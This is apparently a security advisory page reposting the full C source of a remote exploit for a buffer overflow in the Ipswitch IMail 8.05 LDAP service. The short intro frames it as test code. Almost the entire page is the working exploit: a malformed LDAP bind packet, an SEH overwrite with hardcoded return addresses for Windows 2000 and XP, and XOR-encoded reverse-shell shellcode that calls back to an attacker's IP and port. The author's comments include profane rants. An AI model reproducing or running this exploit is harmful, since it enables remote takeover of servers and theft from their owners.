|
|
|
|
| |
| As we reported in our previous article: Ipswitch IMail LDAP Daemon Remote Buffer Overflow, a vulnerability in Ipswitch's IMail allows remote attackers to overflow an internal buffer causing it to execute arbitrary code. The following exploit code can be used to test your system for the mentioned vulnerability. |
| |
Credit:
The information has been provided by Iv?n Rodriguez Almui?a.
|
| |
Exploit:
/******************************************************************/
/* [Crpt] iMail v8.05 LDAP service remote sploit by kralor [Crpt] */
/******************************************************************/
/* fuck iDefense */
/* fuck k-otik */
/* fuck private exploits */
/* in other words, fuck you all security money makers and */
/* private exploits exchangers. */
/* lolo xXx for her patience while these long nights coding */
/* and for errr.. you know what :) */
/******************************************************************/
/* informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/
#include < stdio.h>
#include < stdlib.h>
#include < string.h>
#include < windows.h>
#include < winsock.h>
#pragma comment (lib,"ws2_32")
// EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler)
#define SEH_ADDR 0x50FFFFFF
/* for win2k offset:
--- jmp dword ptr [ebx]
*/
#define HIJACKED_2K_EVL 0x0043BD8B // (8.05 eval)
#define HIJACKED_2K_EXP 0x1000F7B0 // (8.05 express)
#define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure :)))
/* for winXP offset:
--- pop esi
--- pop ebx
--- ret
*/
#define HIJACKED_XP_EVL 0x0041F5C7 // (8.05 eval)
#define HIJACKED_XP_EXP 0x100106BC // (8.05 express)
#define HIJACKED_XP_PRO 0x100103CC // (8.05 pro) (not sure :)))
// sequence of 4 opcodes
#define HOP 0xd4 // host opcode
#define POP 0xd7 // port opcode
int cnx(char *host, int port)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;
sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons((u_short)port);
if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}
void banner(void)
{
printf("\r\n [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
void syntax(char *prog)
{
printf("\r\nsyntax: %s < host> < your_ip> < your_port> < version> [OSver]\r\n\r\n",prog);
printf("< version>\t0\t8.05 professional\r\n");
printf(" \t1\t8.05 express\r\n");
printf(" \t2\t8.05 evaluation\r\n---\r\n");
printf("[OSver] \t0\twindows 2000 universal [default]\r\n");
printf(" \t1\twindows XP universal\r\n");
exit(0);
}
int main(int argc, char *argv[])
{
int sock,bytes,target,osver=0;
WSADATA wsaData;
char buffer[8095];
unsigned long host,port;
unsigned int i;
char req1[] =
"\x30\x82" /* bind request */
"\x0a\x3d" /* bind req len */
/* msg id */
"\x02" /* integer */
"\x01" /* length */
"\x01" /* value */
"\x60" /* bind request */
"\x82" /* msg length 2bytes */
"\x01\x36" /* msg length */
/* LDAP ver */
"\x02" /* integer */
"\xff" /* length */
"\x03" /* value */
"\x05\x00" /* DN NULL */
"\x80\x00"; /* Auth simple */
char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
/* classic xorer */
"\x90"
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
/* reverse remote shell */
"\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
"\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
"\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
"\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
"\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
"\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
"\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
"\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
"\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
"\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
"\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
"\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
"\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
"\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
"\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
"\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
"\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
"\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
"\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
"\x57\x91\x95";
banner();
if(argc< 5||argc>6)
syntax(argv[0]);
host=inet_addr(argv[2])^0x95959595;
port=atoi(argv[3]);
if(!isdigit(argv[4][0])||strlen(argv[4])>1) {
printf("error: < version> must be one digit\r\n");
syntax(argv[0]);
return -1;
}
target=atoi(argv[4]);
if(target< 0||target>2) {
printf("error: < version> must be 0, 1 or 2\r\n");
syntax(argv[0]);
return -1;
}
if(argc==6) {
if(!isdigit(argv[5][0])||strlen(argv[5])>1) {
printf("error: [OSver] must be one digit\r\n");
syntax(argv[0]);
return -1;
}
osver=atoi(argv[5]);
if(osver< 0||osver>1) {
printf("error: [OSver] must be or 1\r\n");
syntax(argv[0]);
return -1;
}
}
if(port< =0||port>65535) {
printf("error: < port> must be between 1 and 65535\r\n");
syntax(argv[0]);
return -1;
}
port=htons((unsigned short)port);
port=port< < 16;
port+=0x0002;
port=port^0x95959595;
for(i=0;i< sizeof(shellc0de);i++) {
if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
memcpy(&shellc0de[i],&host,4);
host=0;
}
if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
memcpy(&shellc0de[i],&port,4);
port=0;
}
}
if(host||port) {
printf("error: unabled to find ip/port sequence in shellc0de\r\n");
return -1;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
sock=cnx(argv[1],389);
if(!sock)
return -1;
/* < ----- magic packet -----> */
strncpy(buffer,req1,13);
memset(&buffer[13],0x90,7010);
*(unsigned long*)&buffer[13] = SEH_ADDR;
if(!osver) {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_2K_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_2K_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_2K_EVL;
} else {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_XP_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_XP_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_XP_EVL;
}
*(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 < unwanted instructions> on winXP
memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1);
memcpy(&buffer[7000+23],&req1[10],4);
printf("[+] Sending magic packet ...");
bytes=send(sock,buffer,sizeof(buffer)-1,0);
printf("Done\r\n");
if(bytes==0) { printf("error: send()\r\n"); }
closesocket(sock);
return 0;
}
|
|
|
|
|
